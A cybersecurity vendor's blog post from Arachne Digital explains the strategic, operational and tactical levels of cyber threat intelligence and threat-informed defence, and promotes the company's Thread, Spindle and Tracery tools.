Cookies Policy
We use strictly necessary cookies whilst you are here. These are to enable the website to work and cannot be disabled. To read more about what this means, please see our Privacy Policy.

The Three Levels of Cyber Threat Intelligence (And Why You Need All of Them)

April 13, 2025
Cyber Threat Intelligence covers more than initially thought — read about its different levels, and how using all can maximise its benefits.

by Kade Morton (CEO)
Introduction

Strategic, 
Operational, 
and 
Tactical.

When people talk about cyber threat intelligence (CTI), what they usually mean is Indicators of Compromise, IOCs.

IP addresses, malware hashes, domains, YARA or Sigma rules. That’s the tactical level. It’s valuable, but it’s also just one part of the picture.

In reality, threat intelligence operates across three levels: strategic, operational, and tactical. And if you’re only using one, you’re not getting the full benefit CTI can provide.

This post will break down each level, give examples of how it’s used, and help you figure out if your organisation is using CTI to its full potential.

Tactical CTI: The Front Line

Tactical CTI is where most CTI programs begin, and often where they stop.

What it is:

Tactical CTI provides observable indicators. Think:

  • Malicious IPs
  • File hashes
  • Suspicious domains
  • Signatures for malware or exploits

Who it’s for:

SOC analysts, detection engineers, threat hunters.

Use cases:

  • Blocking known threats at the firewall or endpoint
  • Speeding up triage during alert investigations
  • Writing detection rules for SIEM or EDR
  • Automating defences through IOC feeds

Where Arachne Digital fits:

We built Thread to enrich raw text (news articles, threat reports, breach disclosures) with MITRE ATT&CK TTPs. Instead of just telling you “this IP is bad,” Thread helps you understand how it was used, initial access, lateral movement, exfiltration, and allows you to map threat activity directly into your environment.

Operational CTI: Connecting the Dots

Operational CTI tells you how attackers work. This is the bridge between raw indicators and strategic decision-making.

What it is:

Operational CTI focuses on campaign patterns and attacker behaviours, such as:

  • Common tactics and techniques
  • Toolsets used in recent intrusions
  • Shifts in targeting or tradecraft
  • Infrastructure reuse across campaigns

Who it’s for:

Detection engineers, incident response teams, purple teams, CTI analysts.

Use cases:

  • Improving detection through understanding TTPs
  • Informing red team simulations
  • Building better playbooks
  • Prioritising patching and hardening efforts

Where Arachne Digital fits:

Thread helps here too, but so does Spindle. Spindle tracks known threat actors and their aliases, linking them to ATT&CK TTPs, historical campaigns, and public reporting. Combined, these tools let analysts move from “what happened” to “how and why it happened.”

Strategic CTI: The Bigger Picture

Strategic CTI zooms all the way out. It’s about adversaries, motivations, and risk. This is the type of intelligence that belongs in a boardroom briefing.

What it is:

Strategic CTI answers questions like:

  • Who’s targeting our sector, and why?
  • Are we at risk due to geopolitical events?
  • What threats should we plan for over the next year?

Who it’s for:

CISOs, risk managers, executive leadership, and policymakers.

Use cases:

  • Informing security strategy and budgeting
  • Supporting business continuity and resilience planning
  • Justifying investments in specific capabilities
  • Understanding long-term adversary intent

Where Arachne Digital fits:

This is where Spindle and Tracery come in. Spindle organises threat actor attribution across campaigns and countries, while Tracery, our privacy-focused metasearch engine, helps us find the raw reports needed to track global threats in real time. Together, they provide both the source material and the structure for strategic decision-making.

Why You Need All Three

Most organisations think they’re “doing CTI” when they subscribe to an IOC feed. But tactical intelligence on its own is reactive. It only tells you what the attacker did yesterday.

Without operational CTI, you don’t know how attackers adapt.
Without strategic CTI, you don’t know which threats matter most to your business.

If you want to build a threat-informed defence, as popularised by MITRE, you need to align defences against the threats most likely to affect you, and that means understanding the full threat landscape across all three levels.

What Is Threat-Informed Defence?

Threat-informed defence is the practice of aligning your security decisions and controls with real-world threats, based on how adversaries actually operate.

Rather than guessing what might happen or relying solely on compliance checklists, threat-informed defence starts with threat intelligence. It uses data about actual attacks, campaigns, tools, and tactics used in the wild, to shape detection rules, response plans, and long-term strategy.

It’s about moving from reactive to proactive. From generic protection to tailored defence.

Why It’s Useful

  • Better resource allocation: You can focus on threats that are relevant to your organisation or sector, rather than trying to defend against everything.
  • Improved detection: Understanding TTPs lets you build detections that catch attacker behaviour, not just known indicators.
  • Faster response: Playbooks and simulations can be based on real adversary workflows, reducing the time it takes to contain and recover.
  • Stronger justification: Strategic CTI helps security teams communicate risks and justify investment to executives and boards.

How CTI Guides the Process

Threat-informed defence is only possible with good CTI. Here’s how the three levels of intelligence feed into the process:

  • Tactical CTI provides indicators to detect and block known threats.
  • Operational CTI reveals how attackers behave, helping teams build effective detections and playbooks.
  • Strategic CTI shapes long-term priorities by showing which threats are most likely to target your business.

When CTI is structured and mapped, such as through frameworks like MITRE ATT&CK, it becomes even more powerful. You can see gaps in your defences, align your security controls with actual threats, and track improvement over time.

Threat-informed defence is at the heart of what Arachne Digital does. Every tool we build, Thread, Spindle, Tracery, is designed to help organisations not just consume intelligence, but apply it meaningfully.

Takeaway: Ask These Two Questions
  • Am I getting all three levels of CTI from my provider? (Tactical, Operational, Strategic)
  • Am I actually using that intelligence to shape detection, response, and strategy?

If the answer to either is no, you’re leaving value on the table.

Start thinking holistically about threat intelligence.

Benefits

Why 
select 
Arachne?

Do you want to maximise your security within your budget? Arachne Digital is the logical choice.

Our platform searches the internet for information on threat actors, gathers reports, and categorises the findings by region, industry, and threat actor. Our process automatically maps TTPs to MITRE ATT&CK®, slashing research time and saving you money.

Threat Mitigation Experts

Connect with a way to see and neutralise potential attacks before they impact your organisation. Arachne Digital empowers organisations to anticipate and avoid cyber threats by delivering actionable intelligence.

Optimised Security Posture

By integrating the precise threat intelligence provided by our reports, you can evolve, prioritise and implement effective and continually updated security controls relevant to your organisation.

Streamlined Compliance

Comprehensive, insightful threat intelligence reports support audit preparations. Demonstrate a proactive approach to cybersecurity and achieve and maintain compliance more easily.

Testimonials 
& 
Partnerships

“Arachne Digital’s team works closely with us in integrating our tool, Speculo, with their data. Speculo is designed to help organisations get a full picture of their cyber risk with reliable analytics and a streamlined risk assessment process. The integration of Arachne Digital’s threat intelligence into Speculo provides evidence-based insights into cyber risks, making the tool more relevant to our customers. Arachne facilitated multiple face-to-face meetings and video calls, provided technical resources, comprehensive documentation, and example reports. This collaboration ensured that we could seamlessly integrate and utilize their data, significantly enriching the value we deliver to our clients.

Arachne Digital’s commitment to excellence and their proactive approach in supporting our needs have made them an indispensable partner. We highly recommend their services to any organisation looking to strengthen their threat intelligence capabilities.”

Partnership

We 
are 
partnered 
with 
DISARM 
Foundation.

Arachne Digital is proud to partner with the DISARM Foundation as the inaugural member of their Partner Programme, launched at the beginning of 2024.

This partnership is crucial in supporting the DISARM Foundation’s mission to maintain and enhance the DISARM Framework, ensuring it remains a free and continuously updated resource in the fight against disinformation.

Through our collaboration, Arachne Digital provides valuable feedback, promotes the integration of the framework into our operations, and encourages wider adoption within the defender community. This partnership highlights our commitment to combating evolving threats and fostering a secure digital environment.


Empower. 
Defend. 
Prevail.

Newsletter
Stay in the loop with our latest updates, exclusive offers, and content by subscribing to our newsletter.

© 2025 Arachne Digital, ALL RIGHTS RESERVED
Built by